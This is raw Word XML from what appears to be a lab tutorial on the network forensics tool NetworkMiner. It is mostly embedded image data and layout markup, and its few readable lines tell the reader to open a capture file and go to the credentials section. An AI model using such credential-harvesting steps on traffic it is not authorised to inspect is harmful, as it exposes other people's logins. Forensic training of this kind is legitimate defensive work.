IupAKKKK&#10;zKCiiigAooooAKKKKACioamoAKKKKACiiigAooooAKKhqagAooooAKKKKACiiigAoqGpqACiiigA&#10;ooooAK4/UvAf/CUapc3evXc8sccn/Estra4kj+yf9NP3f/LT/WfvP+2f/PTzOwooAzfD8Wp2uj20&#10;Grzx3N7H+7kuY/8Al4/6af8ATOvk/wDa++DfxS8WXVzafDi6Nla34S4nvR5kcscvmfPHHJbx+Z1j&#10;jk/ef89K+wqKAPmD9lf4f+MvBXg3wpofi2K+vPENhqd5e3+tXSSSxz28kdxHHH9ok/ef6ySP/v3X&#10;rPj/AMyLxxos/wBv/syP+xNUt476SSOOOOT7Rp/l/vJI5I/+Wcn/ACz/AOWdejUUAeayazB/q01r&#10;R5Y/Ljj8yTU7f/5HqTRJY7rx5p3kalHq/wC71CTzI5I5Ps8cklv5cf7uOP8Az/y0kr0aigDj/i9p&#10;d3rHwz8R2GnQSXN7Pb/u444/Mkkry3xJ4D8Uap9p13RIJ4r238O/Yvs1zBHb/b45JLjzLfy4/wDV&#10;yfvI5I/+mkcdfQVFAHj+m6NrWl+LLKP+xZLm5k1P7RcatJaRyR/Y/L/dx+Z/rI5I/wDV17BUNTUA&#10;efeJNB/svxJrWu2uhSa5JcaJJbyW3meZ9ok8z93H+8rnNJ8OXdh4Dk36bdS3NxcSSSeXYf6uSS48&#10;z93p8n7vy/8App5nmV7JRQB43pug38uueArC68PSWMek2lvJJfW1pHJJJJ5ckf2fzPM/dxx/+1P+&#10;/nslFFAHzL/wUK+GPij4u/Aa20Lwjos+uaqmtW85traSOP8AdpFJ/wA9K/Mmz+EvjP4qa1qegeB/&#10;hzrEWo6U0kOqwXyWkktu/wDcMn2aDy3GH461+6FNhsYlmnaKOOOaX/WybPv0AeZ/s1+F9S8G/ADw&#10;HoWtWkljqthpNvb3dtL/AMs5PLr06iigDNs/+QbYf9e6fyopll/yC7D/AK90/lRQB//ZUEsDBBQA&#10;BgAIAAAAIQB/HCbi3QAAAAUBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BS8NAEIXvgv9hGcGb3aRa&#10;sTGbUop6KkJbofQ2TaZJaHY2ZLdJ+u8dvejlwfCG976XLkbbqJ46Xzs2EE8iUMS5K2ouDXzt3h9e&#10;QPmAXGDjmAxcycMiu71JMSncwBvqt6FUEsI+QQNVCG2itc8rsugnriUW7+Q6i0HOrtRFh4OE20ZP&#10;o+hZW6xZGipsaVVRft5erIGPAYflY/zWr8+n1fWwm33u1zEZc383Ll9BBRrD3zP84As6ZMJ0dBcu&#10;vGoMyJDwq+LNn6Yy42hgNo8j0Fmq/9Nn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Y1Zn0FEEAACTDwAADgAAAAAAAAAAAAAAAAA9AgAAZHJzL2Uyb0RvYy54bWxQ&#10;SwECLQAKAAAAAAAAACEAiAHN13cEAQB3BAEAFAAAAAAAAAAAAAAAAAC6BgAAZHJzL21lZGlhL2lt&#10;YWdlMS5qcGdQSwECLQAUAAYACAAAACEAfxwm4t0AAAAFAQAADwAAAAAAAAAAAAAAAABjCwEAZHJz&#10;L2Rvd25yZXYueG1sUEsBAi0AFAAGAAgAAAAhADedwRi6AAAAIQEAABkAAAAAAAAAAAAAAAAAbQwB&#10;AGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAYABgB8AQAAXg0BAAAA&#10;">
                <v:rect id="Rectangle 3076" o:spid="_x0000_s1230" style="position:absolute;left:59448;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3ABD7F40" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3077" o:spid="_x0000_s1231" style="position:absolute;top:34009;width:2627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0E0D4215" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>Network Miner is an NFT tool</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3078" o:spid="_x0000_s1232" style="position:absolute;left:19769;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5A708160" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3079" o:spid="_x0000_s1233" style="position:absolute;top:3603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51E2F7FE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 3094" o:spid="_x0000_s1234"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JpxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/RasJA&#10;FETfC/7DcoW+1Y0xFE1dRQoRoVap7Qdcdq9JMHs3zW5N+veuUOjjMDNnmOV6sI24UudrxwqmkwQE&#10;sXam5lLB12fxNAfhA7LBxjEp+CUP69XoYYm5cT1/0PUUShEh7HNUUIXQ5lJ6XZFFP3EtcfTOrrMY&#10;ouxKaTrsI9w2Mk2SZ2mx5rhQYUuvFenL6ccqKHTav6VHk+3axYG/37d7nRV7pR7Hw+YFRKAh/If/&#10;2jujYJYsMri/iU9Arm4AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAbo0iacYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                  <v:imagedata r:id="rId72" o:title=""/>
                </v:shape>
                <v:shape id="Shape 3095" o:spid="_x0000_s1235"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1UIxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvhX6H5Qm91Y3GlhhdpWgrPVoVxNsj+/IHs29DdpvEb+8WCh6HmfkNs1wPphYdta6yrGAyjkAQ&#10;Z1ZXXCg4Hb9eExDOI2usLZOCGzlYr56flphq2/MPdQdfiABhl6KC0vsmldJlJRl0Y9sQBy+3rUEf&#10;ZFtI3WIf4KaW0yh6lwYrDgslNrQpKbsefo2Cz3569pf97ppMcqubWbHleH9U6mU0fCxAeBr8I/zf&#10;/tYK4mj+Bn9vwhOQqzsAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEATmtVCMYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E618085"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03296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="735B026E" wp14:editId="05792B14">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41034" name="Group 4103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00" name="Shape 498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01" name="Shape 498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02" name="Shape 498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03" name="Shape 498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04" name="Shape 498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34" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49805" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49806" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49807" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49808" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4980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14764E26" wp14:editId="19A0BDE8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41035" name="Group 41035"/>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10" name="Shape 498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11" name="Shape 498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12" name="Shape 498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13" name="Shape 498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14" name="Shape 498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35" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49815" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49816" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49817" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49818" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4981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Step 9: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Locate the capture file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8C600F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="84"/>
        <w:ind w:right="-184"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46A2264D" wp14:editId="55A43A94">
                <wp:extent cx="5986577" cy="3752745"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="41033" name="Group 41033"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5986577" cy="3752745"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986577" cy="3752745"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="3084" name="Rectangle 3084"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5944820" y="3236260"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="32537EC2"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85" name="Rectangle 3085"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3400852"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="583B09C6"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86" name="Rectangle 3086"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3603545"/>
                            <a:ext cx="3483667" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5EDD9C45" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>After opening go to credentials section</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="3087" name="Rectangle 3087"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2621610" y="3603545"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5F80069B"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097" name="Picture 3097"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId73"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="38303" y="12700"/>
                            <a:ext cx="5873750" cy="3300730"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="3098" name="Shape 3098"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="25603" y="0"/>
                            <a:ext cx="5899150" cy="3326130"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5899150" h="3326130">
                                <a:moveTo>
                                  <a:pt x="0" y="3326130"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5899150" y="3326130"/>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A2264D" id="Group 41033" o:spid="_x0000_s1236" style="width:471.4pt;height:295.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59865,37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LnDUUAQAAJYPAAAOAAAAZHJzL2Uyb0RvYy54bWzkV21v2zYQ/j5g&#10;/0HQ98Z6sWRZiFMMzRoUGNagLz+ApilLGEUKJB07+/W7O4qym7hLmwFZsQWITInH43MP78iHl68P&#10;vYzuhLGdVqs4vUjiSCiuN53aruLPn96+quLIOqY2TGolVvG9sPHrq59/utwPtch0q+VGmAicKFvv&#10;h1XcOjfUs5nlreiZvdCDUNDZaNMzB69mO9sYtgfvvZxlSVLO9tpsBqO5sBa+XvvO+Ir8N43g7n3T&#10;WOEiuYoBm6Onoecan7OrS1ZvDRvajo8w2DNQ9KxTMOnk6po5Fu1M98hV33GjrW7cBdf9TDdNxwXF&#10;ANGkyYNobozeDRTLtt5vh4kmoPYBT892y3+/uzHDx+HWABP7YQtc0BvGcmhMj7+AMjoQZfcTZeLg&#10;Ig4fi2VVFotFHHHoyxdFtpgXnlTeAvOPxvH21ydGzsLEsy/g7AdIEHvkwP4zDj62bBBEra2Bg1sT&#10;dRsIIKnmcaRYD5n6AXKHqa0UEX0lesh2IsvWFng7w1SxnM+rDNINOcnyMivHRJtYK4ocCgM5S5fV&#10;PC+RsilwVg/Guhuh+wgbq9gAFMoudvebdd40mOD0UuFT6bedlL4XvwB/ASG23GF9oCCXS5wNP631&#10;5h4ib7X58z3UcCP1fhXrsRVjWcPk2BtH8p0CxrGCQsOExjo0jJNvNNWZh/PLzummI7zH2UZcsJQe&#10;w0usaXF2TSlPERis/9NrOq7mPEmqIvMZ/kOsZppQbh0J/u8vZ3l2OamGvnc5yyQvwoYVljOfV3lZ&#10;jlvay5dnmqT/t/oErs/suYtAwzfVZ1ZmaZmOVXpuWYt/c89NE9ozfoQqHTpew/8oJqD16CB9WnTB&#10;KLczIh6d9N/ko2fmj93wCnTPwFy37mTn7knDwdGGoNTdbcfxPMWX0zN5OeUHGOC8cCLDNzjEgiWO&#10;w4MP379ws5bdgKciHkjYHgGDAHwgoM7E7MXZtea7Xijn1aYRErBrZdtusHFkatGvBQgH825DVctq&#10;64xwvMUJG5gYVYQ/kqcOQnkEhpi/oiPyKk9yUhFptvD7PKvDNlVUC9BbkPCkvPIkWeR0EjxXRhAs&#10;D4SagOvFTugliCG/A5Auw/Wtvq/6Cyh5Yuqh0qqWy/TIUlamj1jiOy+2cMmCwAIhv/FSC761ocUP&#10;KjRRkv3tnQJyHMehU2xGoKyKgKUFWZh7KNjfg+T6pMnSHQVzsPDZc7SR6tR28olSc/TpRwS78DuQ&#10;71P7kC7BIvx6S7+VPrThUlvhJ8CwSLVOoULqnZIpFUadFaCZIEsZ3O4aqB4SsnCxUZuA85FUte5e&#10;CuRDqg+iAdEKF42UxlmzXb+RJrpjqDPpD/MEJiZTHOOrbhyVfHUUmjI5tGz0NboZJyCXoye0FHSV&#10;nMCMbvmIxt8n4VYGcYZbJUCaBhEsrdw0XsFdmCbEA2GM9ng2YED4RhqZbkFw+SNE40UVb5en72R/&#10;vE5f/QUAAP//AwBQSwMECgAAAAAAAAAhAA+DhXX/HgEA/x4BABQAAABkcnMvbWVkaWEvaW1hZ2Ux&#10;LmpwZ//Y/+AAEEpGSUYAAQEBAGAAYAAA/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwK&#10;DAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU/9sAQwEDBAQFBAUJBQUJFA0LDRQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU/8AAEQgCHQP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